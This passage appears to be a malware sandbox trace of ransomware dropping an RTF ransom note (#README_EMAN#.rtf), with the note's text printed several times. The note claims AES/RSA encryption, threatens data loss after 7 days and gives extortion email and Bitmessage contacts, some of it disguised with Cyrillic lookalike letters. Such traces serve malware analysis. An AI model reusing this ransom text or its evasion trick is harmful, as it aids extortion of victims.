safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ee8a78, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nªV\x9a\x1d0Q²e\x02ï|O\x18·\x91\x0f\x92Î\x12µK\x16Õ3\x1e", lpUsedDefaultChar=0x0) returned 8717 [0269.789] WriteFile (in: hFile=0x284, lpBuffer=0x1ee8a78*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ee8a78*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0269.790] CloseHandle (hObject=0x284) returned 1 [0269.790] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Color\\Profiles\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\color\\profiles\\#readme_eman#.rtf")) returned 0xffffffff [0269.790] GetLastError () returned 0x2 [0269.790] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Color\\Profiles\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\color\\profiles\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x284 [0269.790] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0269.790] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a 